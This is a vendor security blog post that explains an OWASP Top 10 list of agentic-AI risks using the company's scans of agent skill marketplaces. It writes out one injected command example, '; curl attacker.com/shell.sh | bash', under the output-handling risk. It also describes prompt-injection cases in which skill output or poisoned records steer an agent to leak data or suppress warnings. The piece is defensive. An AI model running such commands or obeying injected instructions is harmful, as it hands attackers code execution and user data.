OWASP's Top 10 for AI Agents: What Every Developer Needs to Know
SkillShield Research Team
Security Research
OWASP has published its Top 10 risks for Agentic AI applications, and if you're building or using AI agents, it's required reading. The framework covers everything from excessive permissions to supply chain attacks — and after scanning 1,676 AI agent skills, we can confirm that every single one of these risks is actively being exploited in the wild.
Here's what the OWASP Agentic AI Top 10 covers, what each risk looks like in practice, and what you can do about it. Scan your AI skills for OWASP vulnerabilities today. Protect against ClawHub security threats and other marketplace risks.
Why This Matters Now
AI agents aren't research prototypes anymore. They're managing infrastructure, processing financial data, accessing corporate systems, and running on developer machines with full file system access. The attack surface is massive, and until now there hasn't been a standardized framework for reasoning about it.
The OWASP Top 10 for Agentic Applications fills that gap. Like the original OWASP Top 10 for web applications — which fundamentally changed how the industry approaches web security — this framework gives security teams and developers a shared vocabulary for agentic AI risks.
Let's walk through each one.
ASI01: Excessive Agency
The risk: Agents that can take actions beyond what's necessary for their intended purpose.
In practice: This is the most fundamental issue in the AI agent ecosystem. Most agent frameworks give skills/plugins the same level of access as the host agent itself — which typically means full file system access, network access, and the ability to execute code.
When we scanned ClawHub, we found skills marketed as "text formatters" and "note organizers" that had the same system access as deployment automation tools. There's no permission boundary between them.
Protecto.ai's analysis of the Salesforce Agentforce "ForcedLeak" vulnerability demonstrated this at enterprise scale: poisoned CRM records triggered an AI agent to exfiltrate sensitive customer data through its overly broad permissions. The agent could have been scoped to read-only. It wasn't.
What to do: Implement least-privilege access for every agent and skill. If a skill formats text, it shouldn't have network access. If it queries an API, it shouldn't read local files. Treat every permission as an attack surface.
ASI02: Unrestricted Autonomy
The risk: Agents that operate without adequate human oversight or approval gates.
In practice: The entire value proposition of AI agents is autonomy — "set it and forget it." But unrestricted autonomy means that when something goes wrong (a malicious skill, a prompt injection, a hallucinated action), there's no human in the loop to catch it.
We found skills that, once installed, automatically installed additional skills without user approval. In the crypto campaign, malicious skills used the agent's own API to install persistence mechanisms — all without the user seeing a single prompt.
What to do: Build approval gates for high-impact actions: installing new skills, accessing credentials, making financial transactions, modifying system configuration. Autonomy should be earned through trust, not granted by default.
ASI03: Prompt Injection
The risk: Malicious instructions embedded in data that the agent processes, causing it to deviate from its intended behavior.
In practice: This is arguably the most technically interesting risk on the list, and it's one we've analyzed in depth. Skills can embed hidden instructions in their output that manipulate the host agent — instructing it to suppress security warnings, forward conversation data, or grant elevated permissions.
The Moltbook community attacks documented by Vectra AI showed how indirect prompt injection through community-posted content could hijack agent behavior at scale.
What to do: Treat all skill output as untrusted input. Implement output filtering and context separation. Never allow skill output to modify agent system prompts or permission levels.
ASI04: Tool and Skill Poisoning
The risk: Compromised or malicious tools/skills in the agent's supply chain.
In practice: This is the risk our entire scan of 1,676 skills is about. 12% of marketplace skills are actively malicious. 27.5% score CRITICAL. The supply chain is poisoned, and most users have no way to detect it.
The parallels to traditional software supply chain attacks are exact. As eSecurity Planet's 2026 AI threat analysis notes, "agentic AI supply chain attacks follow the same playbook as npm/PyPI poisoning, but with significantly broader access."
What to do: Scan every skill before installation. Use automated tools like SkillShield that analyze skill code, manifest permissions, and behavioral patterns. Don't rely on marketplace download counts or ratings — they're trivially gamed.
ASI05: Insecure Output Handling
The risk: Agent outputs that are consumed by downstream systems without validation or sanitization.
In practice: When an AI agent generates code, SQL queries, API calls, or shell commands based on skill output, any injection in the skill output propagates to those downstream actions. A skill that returns a "helpful" shell command containing ; curl attacker.com/shell.sh | bash turns the agent into an unwitting accomplice.
Our scans found skills that embedded shell metacharacters and SQL injection payloads in their output strings — designed to be executed when the agent processes their responses.
What to do: Sanitize and validate all agent outputs before they're executed by downstream systems. Apply the same input validation principles you'd use for web application security — because the attack surface is identical.
ASI06: Insecure Credential Management
The risk: Improper storage, handling, or exposure of credentials used by agents and skills.
In practice: This is the bread and butter of the ClawHub crisis. Skills that read ~/.ssh/id_rsa, parse environment variables for API keys, and access cloud credential stores. The problem is compounded by the fact that most agent frameworks store their own API tokens in plain text configuration files, creating a single point of compromise.
Guardz research found that 54% of organizations lack proper input validation for AI-connected systems — and credential management is consistently the weakest link.
What to do: Use credential managers (not environment variables) for sensitive keys. Scope API tokens to minimum required permissions. Rotate credentials regularly. Never allow skills to access credential stores directly — use a broker pattern with audit logging.
ASI07: Inadequate Sandboxing
The risk: Skills and agents running without proper isolation from each other and the host system.
In practice: Most AI agent frameworks run skills in the same process as the host agent, with the same file system access, network access, and execution privileges. There's no container boundary, no seccomp profile, no capability restrictions.
This means a "weather checker" skill can read your SSH keys, and a "text formatter" can open network connections to C2 servers. The absence of sandboxing is the architectural root cause behind most of the attacks we've documented.
What to do: Run skills in sandboxed environments — containers, VMs, or WASM runtimes. If your agent framework doesn't support sandboxing, run the agent itself in a container with limited host access. Our security checklist covers practical isolation strategies.
ASI08: Inadequate Multi-Agent Trust
The risk: Agents that trust other agents or agent-produced data without verification.
In practice: In multi-agent architectures (increasingly common in 2026), agents delegate tasks to sub-agents and consume their results. If one agent in the chain is compromised — or simply produces adversarial output — every downstream agent that trusts its output is affected.
This is the distributed systems trust problem applied to AI, and it's one area where the security community is still developing solutions. Zero-trust principles apply: verify everything, trust nothing by default.
What to do: Implement verification at every agent boundary. Sign and validate agent outputs. Maintain audit trails of inter-agent communications. Apply the same skepticism to agent-produced data that you'd apply to user input.
ASI09: Insufficient Logging and Monitoring
The risk: Agents that operate without adequate audit trails, making incident detection and response impossible.
In practice: Most AI agent frameworks log conversations but not skill behavior. They'll record that a skill was invoked, but not what network calls it made, what files it accessed, or what data it exfiltrated. The crypto campaign ran for three weeks undetected partly because there was no behavioral monitoring.
DarkTrace's State of AI Cybersecurity report emphasizes that organizations deploying AI agents need "the same depth of monitoring they'd apply to any privileged system service" — but few are doing it.
What to do: Log all skill actions: file access, network calls, credential access, inter-agent communication. Implement anomaly detection. Alert on unexpected network connections, credential access outside declared scope, and privilege escalation attempts.
ASI10: Uncontrolled Scaling
The risk: Agents that can self-replicate, spawn sub-tasks, or consume resources without limits.
In practice: An agent that can install skills can install skills that install more skills. An agent that can spawn sub-agents can create runaway processes. Without resource limits and recursion controls, a single malicious input can cascade into system-wide resource exhaustion or exponential compromise.
What to do: Implement hard limits on skill installation, sub-agent spawning, and resource consumption. Apply circuit breakers. Monitor for recursive or exponential behavior patterns.
Putting It All Together
The OWASP Agentic AI Top 10 isn't a theoretical exercise. Every risk on this list has real-world exploits in the wild. Our scan data confirms it:
| OWASP Risk | SkillShield Detection Rate |
|---|---|
| ASI01 Excessive Agency | Found in 38% of CRITICAL skills |
| ASI03 Prompt Injection | Found in 15% of CRITICAL skills |
| ASI04 Supply Chain Poisoning | 12% of all skills are malicious |
| ASI06 Credential Theft | Found in 61% of CRITICAL skills |
| ASI07 No Sandboxing | Universal — no marketplace enforces it |
What You Should Do
- Read the full OWASP framework. Bookmark it. Share it with your team. It's the best structured overview of agentic AI risks available.
- Audit your current agent setup against each of the 10 risks. Where are your gaps?
- Prioritize ASI04 and ASI06 — supply chain and credential management. These are the most actively exploited risks and the most impactful to address.
- Scan your skills. SkillShield maps findings directly to the OWASP Agentic AI framework, so you can see which risks apply to your specific setup.
- Build security into your agent architecture from the start. Retrofitting sandboxing and permission systems is significantly harder than designing them in.
The Bottom Line
The OWASP Top 10 for Agentic AI is the security industry's clearest statement yet that AI agent security is a real, urgent problem. Not a future concern. Not a theoretical risk. A present, measurable, exploitable attack surface.
The framework exists. The data confirms the risks. The question is whether you'll address them before or after something breaks.
Map your agent risks with SkillShield →
Related reading: